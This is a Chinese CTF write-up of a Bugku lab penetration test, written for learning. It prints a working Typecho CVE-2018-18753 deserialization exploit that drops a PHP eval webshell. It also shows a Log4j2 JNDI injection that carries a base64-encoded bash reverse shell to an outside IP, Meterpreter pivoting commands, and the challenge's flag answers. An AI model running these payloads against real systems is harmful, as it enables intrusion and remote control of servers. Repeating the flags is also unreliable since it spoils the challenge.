靶机渗透-渗透测试2 | 风尘孤狼
0%

靶机渗透-渗透测试2

bugku的PAR-渗透测试2

渗透测试2 未解决
FLAG数: 9
描  述: 小明在一次渗透测试中进入了某网站的后台但没有继续进行下去的思路了,你能帮帮Ta吗?

开局一个地址http://106.14.195.228:80

image-20240225152526434

发现存在git源码泄露

image-20240225152737453
C:\Users\25963\Desktop\GitHack-master>python GitHack.py -u http://106.14.195.228/.git/
[+] Download and parse index file ...
[+] LICENSE
[+] README.md
[+] index.php
[+] logo.png
[+] phpinfo.php
[OK] README.md
[OK] LICENSE
[OK] phpinfo.php
[OK] index.php
[OK] logo.png

扫目录结果

[02:27:19] 301 -  314B  - /.git  ->  http://106.14.195.228/.git/            
[02:27:19] 200 -  599B  - /.git/                                            
[02:27:19] 200 -  272B  - /.git/config
[02:27:19] 200 -   23B  - /.git/HEAD                                        
[02:27:19] 200 -  413B  - /.git/branches/
[02:27:19] 200 -   73B  - /.git/description
[02:27:19] 200 -  595B  - /.git/hooks/                                      
[02:27:19] 200 -  400B  - /.git/index                                       
[02:27:19] 200 -  240B  - /.git/info/exclude                                
[02:27:19] 200 -  459B  - /.git/info/
[02:27:19] 200 -  191B  - /.git/logs/HEAD                                   
[02:27:19] 200 -  481B  - /.git/logs/
[02:27:19] 301 -  324B  - /.git/logs/refs  ->  http://106.14.195.228/.git/logs/refs/
[02:27:19] 301 -  330B  - /.git/logs/refs/heads  ->  http://106.14.195.228/.git/logs/refs/heads/
[02:27:19] 200 -  191B  - /.git/logs/refs/heads/master
[02:27:19] 301 -  332B  - /.git/logs/refs/remotes  ->  http://106.14.195.228/.git/logs/refs/remotes/
[02:27:19] 200 -  191B  - /.git/logs/refs/remotes/origin/HEAD               
[02:27:19] 200 -  107B  - /.git/packed-refs
[02:27:19] 200 -  543B  - /.git/objects/                                    
[02:27:19] 301 -  325B  - /.git/refs/heads  ->  http://106.14.195.228/.git/refs/heads/
[02:27:19] 200 -   41B  - /.git/refs/heads/master
[02:27:19] 301 -  327B  - /.git/refs/remotes  ->  http://106.14.195.228/.git/refs/remotes/
[02:27:19] 301 -  334B  - /.git/refs/remotes/origin  ->  http://106.14.195.228/.git/refs/remotes/origin/
[02:27:19] 200 -   32B  - /.git/refs/remotes/origin/HEAD
[02:27:19] 301 -  324B  - /.git/refs/tags  ->  http://106.14.195.228/.git/refs/tags/
[02:27:19] 200 -  473B  - /.git/refs/                                                                               
[02:27:26] 301 -  315B  - /admin  ->  http://106.14.195.228/admin/          
[02:27:26] 302 -    0B  - /admin/  ->  http://106.14.195.228/admin/login.php?referer=http%3A%2F%2F106.14.195.228%2Fadmin%2F
[02:27:26] 200 -    0B  - /admin/config.php                                 
[02:27:27] 302 -    0B  - /admin/index.php  ->  http://106.14.195.228/admin/login.php?referer=http%3A%2F%2F106.14.195.228%2Fadmin%2Findex.php
[02:27:27] 200 -    2KB - /admin/login.php                                  
[02:27:38] 200 -    0B  - /config.inc.php                                                                 
[02:27:48] 301 -  317B  - /install  ->  http://106.14.195.228/install/      
[02:27:48] 200 -    0B  - /install.php                                      
[02:27:48] 200 -    0B  - /install.php?profile=default                      
[02:27:48] 200 -  530B  - /install/                                         
[02:27:50] 200 -   10KB - /LICENSE                                          
[02:27:50] 200 -    6KB - /license                                          
[02:27:50] 200 -    6KB - /license.txt                                      
[02:27:51] 200 -   14KB - /logo                                             
[02:27:57] 200 -   18KB - /phpinfo.php                                      
[02:28:01] 200 -   79B  - /README.md                                                                                             
[02:28:12] 301 -  313B  - /usr  ->  http://106.14.195.228/usr/              
[02:28:12] 200 -  484B  - /usr/                                             
[02:28:12] 301 -  313B  - /var  ->  http://106.14.195.228/var/              
[02:28:12] 200 -  618B  - /var/

后台地址/admin/

image-20240225153135274

Typecho1.0框架,存在CVE-2018-18753反序列化漏洞

image-20240225153921473

exp:

<?php
class Typecho_Feed
{
    const RSS1 = 'RSS 1.0';
    const RSS2 = 'RSS 2.0';
    const ATOM1 = 'ATOM 1.0';
    const DATE_RFC822 = 'r';
    const DATE_W3CDTF = 'c';
    const EOL = "\n";
    private $_type;
    private $_items;

    public function __construct(){
        $this->_type = $this::RSS2;
        $this->_items[0] = array(
            'title' => '1',
            'link' => '1',
            'date' => 1508895132,
            'category' => array(new Typecho_Request()),
            'author' => new Typecho_Request(),
        );
    }
}
class Typecho_Request
{
    private $_params = array();
    private $_filter = array();
    public function __construct(){
        $this->_params['screenName'] = 'echo "<?php @eval(\$_POST[1]);?>" > 1.php';
        $this->_filter[0] = 'system';
    }
}

$exp = array(
    'adapter' => new Typecho_Feed(),
    'prefix' => 'typecho_'
);

echo base64_encode(serialize($exp));
?>
//YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=
get:http://47.102.44.129/install.php?finish=a
post:
__typecho_config=YToyOntzOjc6ImFkYXB0ZXIiO086MTI6IlR5cGVjaG9fRmVlZCI6Mjp7czoxOToiAFR5cGVjaG9fRmVlZABfdHlwZSI7czo3OiJSU1MgMi4wIjtzOjIwOiIAVHlwZWNob19GZWVkAF9pdGVtcyI7YToxOntpOjA7YTo1OntzOjU6InRpdGxlIjtzOjE6IjEiO3M6NDoibGluayI7czoxOiIxIjtzOjQ6ImRhdGUiO2k6MTUwODg5NTEzMjtzOjg6ImNhdGVnb3J5IjthOjE6e2k6MDtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fXM6NjoiYXV0aG9yIjtPOjE1OiJUeXBlY2hvX1JlcXVlc3QiOjI6e3M6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX3BhcmFtcyI7YToxOntzOjEwOiJzY3JlZW5OYW1lIjtzOjQxOiJlY2hvICI8P3BocCBAZXZhbChcJF9QT1NUWzFdKTs/PiIgPiAxLnBocCI7fXM6MjQ6IgBUeXBlY2hvX1JlcXVlc3QAX2ZpbHRlciI7YToxOntpOjA7czo2OiJzeXN0ZW0iO319fX19czo2OiJwcmVmaXgiO3M6ODoidHlwZWNob18iO30=
image-20240225154838903

根目录得到flag1:flag{e0d9924caeecfabdb07b9c90fb60e959}

image-20240225154929030

mysql数据库弱口令

image-20240225155053762 image-20240225155109985

得到flag2:flag{aa5c89083bd3836e7c86ef0a2d8681fa}

同时得到后台管理员账密admin/$P$BfY8rUZyXxJy5AeWCVphCYzYR3tZ9I1,这个密码加密了,加密规则没找,已经shell了就不管这台机子了,上传fscan扫下C段

192.168.0.2:3306 open
192.168.0.2:80 open
[*] WebTitle: http://192.168.0.2        code:200 len:3392   title:Harry's Blog
[+] mysql:192.168.0.2:3306:root 
192.168.0.2:3306 open
192.168.0.3:80 open
192.168.0.2:80 open
192.168.0.1:80 open
192.168.0.1:22 open
[*] WebTitle: http://192.168.0.1        code:200 len:3392   title:Harry's Blog
[*] WebTitle: http://192.168.0.2        code:200 len:3392   title:Harry's Blog
[*] WebTitle: http://192.168.0.3        code:200 len:4789   title:Bugku后台管理系统
[+] mysql:192.168.0.2:3306:root

生成msf马搭建代理

image-20240225155916538

添加路由

meterpreter > run autoroute -s 192.168.0.0

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]
[*] Adding a route to 192.168.0.0/255.255.255.0...
[+] Added route to 192.168.0.0/255.255.255.0 via 106.14.195.228
[*] Use the -p option to list all active routes
meterpreter > run autoroute -p

[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.
[!] Example: run post/multi/manage/autoroute OPTION=value [...]

Active Routing Table
====================

   Subnet             Netmask            Gateway
   ------             -------            -------
   192.168.0.0        255.255.255.0      Session 1

成功代理访问192.168.0.3

image-20240225160158952

扫目录没发现啥

发现msf的代理有个缺点就是不能流量太多,要不然会话直接死掉,这里还是换成frp来扫目录吧,扫目录这种流量太多,msf就坏掉了

抓登录的包发现有个提示Source:

image-20240225161352665

访问下载源码发现是java

image-20240225161654705

Log4j2CtfApplication.java

package com.example.log4j2ctf;

import org.springframework.boot.SpringApplication;
import org.springframework.boot.autoconfigure.SpringBootApplication;

@SpringBootApplication
public class Log4j2CtfApplication {

    public static void main(String[] args) {
        SpringApplication.run(Log4j2CtfApplication.class, args);
    }

}

DamnVulnerableLog4j.jav

package com.example.log4j2ctf.controller;

import org.slf4j.Logger;
import org.slf4j.LoggerFactory;
import org.springframework.web.bind.annotation.PostMapping;
import org.springframework.web.bind.annotation.RestController;

import javax.servlet.http.HttpServletResponse;

@RestController
public class DamnVulnerableLog4j {

    private final Logger logger = LoggerFactory.getLogger(this.getClass());
    private int count = 0;

    @PostMapping("/login")
    public String login(String user, String pwd, HttpServletResponse response) {
        response.addHeader("Source", "/source.zip");
        /*
         *
         *
         */
        logger.info("用户登录失败,用户名不存在:" + user);

        return "用户名或密码错误,次数 " + (count++);
    }

}

根据文件名不难想到是log4j2漏洞

65102cc1e6457dfb40cda909cfc91f7e

用户名地方能够拼接rmi,idap注入,同时在依赖包里能发现利用springboot相关框架

image-20240225162109341
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC84MS43MC4yNDEuMjExLzY2NjYgMD4mMQ==}|{base64,-d}|{bash,-i}" -A "81.70.241.211"
image-20240225162632516
${jndi:rmi://81.70.241.211:1099/igsfwb}
image-20240225162918555 image-20240225162752966

flag4:flag{a98b304c5ce272cd586da15874ef4e79}

/root/flag

flag5:flag{2a57c5c9e6b970f674b33b574ee30db5}

image-20240225163126191

/proc/self/environ

flag3:flag{e0f92293345ebeb6687d93341afcf402}

image-20240225163232610

多网卡主机,存在其他段

root@44e217274d66:/# ip add
ip add
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
9: eth0@if10: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:c0:a8:00:03 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 192.168.0.3/24 brd 192.168.0.255 scope global eth0
       valid_lft forever preferred_lft forever
15: eth1@if16: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
    link/ether 02:42:c0:a8:01:02 brd ff:ff:ff:ff:ff:ff link-netnsid 0
    inet 192.168.1.2/24 brd 192.168.1.255 scope global eth1
       valid_lft forever preferred_lft forever

先给msf来个shell

image-20240225165056433

继续加路由

image-20240225165205704

服务器太垃圾,,,把服务器内存干爆了,有机会再打吧

制作不易,如若感觉写的不错,欢迎打赏